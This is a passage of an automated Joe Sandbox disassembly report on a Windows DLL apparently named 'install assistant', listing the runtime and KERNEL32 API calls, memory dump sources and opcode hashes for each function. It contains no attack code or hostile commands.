                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              • Opcode ID: 30ce951fa38ead23bbf3eeef391fa11be285fa71039f916efd6ec02da3701412
                              • Instruction ID: c94e6c800c493279153aeefa810a1b43632a8ddf2456ec39959c40090cb70e0d
                              • Opcode Fuzzy Hash: 30ce951fa38ead23bbf3eeef391fa11be285fa71039f916efd6ec02da3701412
                              • Instruction Fuzzy Hash: 8B21C8B1A2563AA7DB1287298CC4A0B776CBF42765B152250FD1AE79C0D730D91085E0
                              APIs
                              • GetConsoleCP.KERNEL32(?,6C23B0D0,?), ref: 6C23BEF9
                              • __fassign.LIBCMT ref: 6C23C0D8
                              • __fassign.LIBCMT ref: 6C23C0F5
                              • WriteFile.KERNEL32(?,6C245AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C23C13D
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C23C17D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C23C229
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: FileWrite__fassign$ConsoleErrorLast
                              • String ID:
                              • API String ID: 4031098158-0
                              • Opcode ID: 2b88f3c32914761f939cc1b3dd8b2ea0bb32c99c5eda8f82b999b00bb4c4ed85
                              • Instruction ID: a03a0e8dcd68ec03e9fc71dff5f20daba683e5655aca5717d09a7743e2c02bee
                              • Opcode Fuzzy Hash: 2b88f3c32914761f939cc1b3dd8b2ea0bb32c99c5eda8f82b999b00bb4c4ed85
                              • Instruction Fuzzy Hash: 17D19AB1E0126C9FCF05DFE8C8809EDBBB5BF49314F24125AE859BB241D731AA06CB50
                              APIs
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C0F2F95
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C0F2FAF
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0F2FD0
                              • __Getctype.LIBCPMT ref: 6C0F3084
                              • std::_Facet_Register.LIBCPMT ref: 6C0F309C
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0F30B7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                              • String ID:
                              • API String ID: 1102183713-0
                              • Opcode ID: 6f8dbcb2d05b48348cc15070a143b7dc5738fa0ace5c45350dfa63f63461f8c1
                              • Instruction ID: 8d92d21f855640691affb79c3f211f949cfff0d27323e757c51399a7a2797a14
                              • Opcode Fuzzy Hash: 6f8dbcb2d05b48348cc15070a143b7dc5738fa0ace5c45350dfa63f63461f8c1
                              • Instruction Fuzzy Hash: D64157B2E006588FCF14CF88D855B9EB7F4FB48724F054129D869ABB40D739A949CF91
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv$__aullrem
                              • String ID:
                              • API String ID: 2022606265-0
                              • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction ID: 28edb4534c1e23d71230e00dffa2c73b7f1d52e2fe93fa06f08d296da5bba89f
                              • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                              • Instruction Fuzzy Hash: 8721933054121EFBDF218F968C40DDFBA6DEF457A9F308235BD2461A90DA718D91C6B1
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C26A6F1
                                • Part of subcall function 6C279173: __EH_prolog.LIBCMT ref: 6C279178
                              • __EH_prolog.LIBCMT ref: 6C26A8F9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: IJ$WIJ$J
                              • API String ID: 3519838083-740443243
                              • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction ID: 06165a166edc3f2c483b6db1f482676570fcd46dedcfd4695c69a77611a8add1
                              • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                              • Instruction Fuzzy Hash: 6A719030900259DFDB15DF65C485BEEB7B0FF14308F1084A9EC56ABB91CB74AA49CBA1
                              APIs
                              • _free.LIBCMT ref: 6C245ADD
                              • _free.LIBCMT ref: 6C245B06
                              • SetEndOfFile.KERNEL32(00000000,6C2446EC,00000000,6C23B0D0,?,?,?,?,?,?,?,6C2446EC,6C23B0D0,00000000), ref: 6C245B38
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C2446EC,6C23B0D0,00000000,?,?,?,?,00000000,?), ref: 6C245B54
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: _free$ErrorFileLast
                              • String ID: 8Q
                              • API String ID: 1547350101-4022487301
                              • Opcode ID: f9e600f32e1e0ec06a6632a182083b375d45f2cd93fb6cb3636a76ff06c74b10
                              • Instruction ID: 117331fab1e6b51ab831ded63880d6dda0bc89640733480930d6c156a8d9da44
                              • Opcode Fuzzy Hash: f9e600f32e1e0ec06a6632a182083b375d45f2cd93fb6cb3636a76ff06c74b10
                              • Instruction Fuzzy Hash: 9341FB7250061EABDB099BB8CC81BCE3BB5EF49328F244521FC94E7B90DB34C8458760
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C27E41D
                                • Part of subcall function 6C27EE40: __EH_prolog.LIBCMT ref: 6C27EE45
                                • Part of subcall function 6C27E8EB: __EH_prolog.LIBCMT ref: 6C27E8F0
                                • Part of subcall function 6C27E593: __EH_prolog.LIBCMT ref: 6C27E598
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: &qB$0aJ$A0$XqB
                              • API String ID: 3519838083-1326096578
                              • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction ID: e28c65e6b1fc2e2b04a52157780c998537557b362944eb4b358757c6cc5c6b48
                              • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                              • Instruction Fuzzy Hash: C8218871D0124CEECB08DBE4D9959EEBBB4AF25318F60412AE81667780DB780E1CCB61
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: J$0J$DJ$`J
                              • API String ID: 3519838083-2453737217
                              • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                              • Instruction ID: 9da9b4390913fc41c8757cda6b78ea5968b505c3df5515d556040b6edad02a07
                              • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                              • Instruction Fuzzy Hash: 5211C5B0500B68CEC720DF5AC49459AFBE4FFA5708B10C91FC4A687B50C7F8A549CB95
                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C22F1B4,?,?,6C22F235,?,?,?), ref: 6C22F13F
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C22F152
                              • FreeLibrary.KERNEL32(00000000,?,?,6C22F1B4,?,?,6C22F235,?,?,?), ref: 6C22F175
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: c9686be9ac01619b63fc2ae23d9a7a687838f829b19745f25ef881f1f98080f6
                              • Instruction ID: 94688bf5afd8e631c418835614d505d86386b094005f48138ad1c0856650025f
                              • Opcode Fuzzy Hash: c9686be9ac01619b63fc2ae23d9a7a687838f829b19745f25ef881f1f98080f6
                              • Instruction Fuzzy Hash: 16F01C32A0162DFBDF029B95CD0DF9FBA79EB4576BFA14064FC05A2590CB748A10DA90
                              APIs
                              • __EH_prolog3.LIBCMT ref: 6C22732E
                              • std::_Lockit::_Lockit.LIBCPMT ref: 6C227339
                              • std::_Lockit::~_Lockit.LIBCPMT ref: 6C2273A7
                                • Part of subcall function 6C227230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C227248
                              • std::locale::_Setgloballocale.LIBCPMT ref: 6C227354
                              • _Yarn.LIBCPMT ref: 6C22736A
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                              • String ID:
                              • API String ID: 1088826258-0
                              • Opcode ID: 50b7951dfa97f7a28b0ad2ca3a906a68867f03e08744acebb6fc8789035623bf
                              • Instruction ID: 9c41096ac4a2e5e8beb8f7b7d56a34f4391667122776bf6a45ea36ffd3e60b31
                              • Opcode Fuzzy Hash: 50b7951dfa97f7a28b0ad2ca3a906a68867f03e08744acebb6fc8789035623bf
                              • Instruction Fuzzy Hash: 5E017C76A045199BDF05DF64C8409BD77B6FF86654B15400DDC1297780CF3CAA46CBD1
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $!$@
                              • API String ID: 3519838083-2517134481
                              • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction ID: 0852cba66617b4ad5f3c070bf29e5fb9591e074b2bca5d524c5b2c36a0b60d19
                              • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                              • Instruction Fuzzy Hash: 33126A7490124EDFCB04CFE9C4D0ADEBBB1BF08709F14806AE845ABB55DB30A946CB64
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog__aulldiv
                              • String ID: $SJ
                              • API String ID: 4125985754-3948962906
                              • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction ID: cf31401208169d7f73caa1ce93ec14dd9542b8738f130f6a2f2fb64b8c248136
                              • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                              • Instruction Fuzzy Hash: 30B11AB5D0020ADFCB24CF99C9C49AEBBB5FF48315F60852EE855A7B50D730AA45CB60
                              APIs
                                • Part of subcall function 6C227327: __EH_prolog3.LIBCMT ref: 6C22732E
                                • Part of subcall function 6C227327: std::_Lockit::_Lockit.LIBCPMT ref: 6C227339
                                • Part of subcall function 6C227327: std::locale::_Setgloballocale.LIBCPMT ref: 6C227354
                                • Part of subcall function 6C227327: _Yarn.LIBCPMT ref: 6C22736A
                                • Part of subcall function 6C227327: std::_Lockit::~_Lockit.LIBCPMT ref: 6C2273A7
                                • Part of subcall function 6C0F2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C0F2F95
                                • Part of subcall function 6C0F2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C0F2FAF
                                • Part of subcall function 6C0F2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0F2FD0
                                • Part of subcall function 6C0F2F60: __Getctype.LIBCPMT ref: 6C0F3084
                                • Part of subcall function 6C0F2F60: std::_Facet_Register.LIBCPMT ref: 6C0F309C
                                • Part of subcall function 6C0F2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0F30B7
                              • std::ios_base::_Addstd.LIBCPMT ref: 6C0F211B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 3332196525-1866435925
                              • Opcode ID: b3413aa4c9498a80ac0f13f709c180714c21a3fb069f3bcd5d99908e57967d78
                              • Instruction ID: 3377c88ea592a8ed2979d1231c45679374865ceab2655d481c73bbf62e78e3be
                              • Opcode Fuzzy Hash: b3413aa4c9498a80ac0f13f709c180714c21a3fb069f3bcd5d99908e57967d78
                              • Instruction Fuzzy Hash: BB41B3B1E003499FDB00CF64C84579ABBF0FF44318F144268E915AB791E7759985CB90
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: $CK$CK
                              • API String ID: 3519838083-2957773085
                              • Opcode ID: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                              • Instruction ID: 00e9367fc465782532805842bb7c745a7bfda6ebeecc60395f3b219e36b49f95
                              • Opcode Fuzzy Hash: 2704db3354b84918023bfe159d178872147a663a780c49e5ab543107787eea7d
                              • Instruction Fuzzy Hash: 67219070E4120A8BDB64DFE8C4D05EEF7B6FB94304F54462AC822E7B91C7744A068AA0
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: 0$LrJ$x
                              • API String ID: 3519838083-658305261
                              • Opcode ID: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                              • Instruction ID: fac0486a05e6e06176fa62713170718ee34fc5693a4ee88373edeab1a14a9c62
                              • Opcode Fuzzy Hash: 4d1a12b996d8cdd79ba2c3eb3f59f6bf691634cc710ec0f5f651f2212a36eb1c
                              • Instruction Fuzzy Hash: 84218076D0211E9ACF04DBD4C980AEEB7B5EF58309F60005BE801B3680DB755E1DCBA1
                              APIs
                              • __EH_prolog.LIBCMT ref: 6C284ECC
                                • Part of subcall function 6C26F58A: __EH_prolog.LIBCMT ref: 6C26F58F
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: H_prolog
                              • String ID: :hJ$dJ$xJ
                              • API String ID: 3519838083-2437443688
                              • Opcode ID: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction ID: cf0cbb7d3cb5c20de6b553e90db13834feec9b71a8872870e1263b4b0068dcc2
                              • Opcode Fuzzy Hash: e3ee415979c90d2d15618e5f431c2d86ccd996bf58f825059be4d34af7dc85d3
                              • Instruction Fuzzy Hash: FD21C6B0801B44CFC760CF6AC14429ABBF4BF29708B40895EC4AA97B11D7B8A648CF55
                              APIs
                              • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C23B0D0,6C0F1DEA,00008000,6C23B0D0,?,?,?,6C23AC7F,6C23B0D0,?,00000000,6C0F1DEA), ref: 6C23ADC9
                              • GetLastError.KERNEL32(?,?,?,6C23AC7F,6C23B0D0,?,00000000,6C0F1DEA,?,6C24469E,6C23B0D0,000000FF,000000FF,00000002,00008000,6C23B0D0), ref: 6C23ADD3
                              • __dosmaperr.LIBCMT ref: 6C23ADDA
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ErrorFileLastPointer__dosmaperr
                              • String ID: 8Q
                              • API String ID: 2336955059-4022487301
                              • Opcode ID: c25f483b4d13d8bf91357b8373009da1805d35d5384d3892c09da59d7be10fa9
                              • Instruction ID: 468170f935b7dabe20929fe85c3bd3fc3ba66ffdccce94b7dc90502ef68e0451
                              • Opcode Fuzzy Hash: c25f483b4d13d8bf91357b8373009da1805d35d5384d3892c09da59d7be10fa9
                              • Instruction Fuzzy Hash: 2A01287771152DAFCF058FAACC05CDE3B29EB863267240218FC15972C0EA70D9018B90
                              APIs
                              • AcquireSRWLockExclusive.KERNEL32(6C32466C,?,652EF5AA,6C0F230E,6C32430C), ref: 6C226B07
                              • ReleaseSRWLockExclusive.KERNEL32(6C32466C), ref: 6C226B3A
                              • WakeAllConditionVariable.KERNEL32(6C324668), ref: 6C226B45
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1930243212.000000006C0A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0A0000, based on PE: true
                               • Associated: 00000006.00000002.1930222189.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931251179.000000006C248000.00000002.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1932448993.000000006C413000.00000002.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: ExclusiveLock$AcquireConditionReleaseVariableWake
                              • String ID: lF2l
                              • API String ID: 1466638765-2379685847
                              • Opcode ID: 253810d785cfd7e8ec3899a6c1b7d81c8d48ad18dcd9deb75401557908ad7430
                              • Instruction ID: 13b60c26461d604474dc5a6c4312360efe58d04415541f7fc582a85446b02e4d
                              • Opcode Fuzzy Hash: 253810d785cfd7e8ec3899a6c1b7d81c8d48ad18dcd9deb75401557908ad7430
                              • Instruction Fuzzy Hash: EBF03978A01500DFCF05EF59E848D95BBBCEB4A711B0180AEFD0687740CB38A911CFA4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID:
                              • String ID: <J$DJ$HJ$TJ$]
                              • API String ID: 0-686860805
                              • Opcode ID: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                              • Instruction ID: 83f4ae15368114be6222d4a81eb9c5747d8c02f5399462c802959c41f1b8f890
                              • Opcode Fuzzy Hash: b82db92acc6f2fd2fd2fd5332bfa7d1e38ecda44958a76cbd211a3f1299ff4ed
                              • Instruction Fuzzy Hash: 3A418574C0528DAFCF24DBA1D4D0CEEB770AF15308BA0816DE92167E51EB35A65DCB21
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1931307518.000000006C258000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C258000, based on PE: true
                               • Associated: 00000006.00000002.1931799852.000000006C323000.00000004.00000001.01000000.00000009.sdmp
                               • Associated: 00000006.00000002.1931826897.000000006C329000.00000020.00000001.01000000.00000009.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_6c0a0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                              Similarity
                              • API ID: __aulldiv
                              • String ID:
                              • API String ID: 3732870572-0
                              • Opcode ID: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                              • Instruction ID: d8765c41025ebe18244a0bca83a0d00029e4e2c7c60f5635634df68313811aef
                              • Opcode Fuzzy Hash: 2bdaa92217569021002d8658a142890db49ae38c047720c0e1f220da2750cc6e
                              • Instruction Fuzzy Hash: 6D1181B620024CBEEB314AA4CC84EABBBB9EF85B44F10841DF95156A50CA71AC05D730
                              APIs
                              • GetLastError.KERNEL32(?,?,?,6C22EF64,6C256DD8,0000000C), ref: 6C2349B7
                              • _free.LIBCMT ref: 6C234A14
                              • _free.LIBCMT ref: 6C234A4A
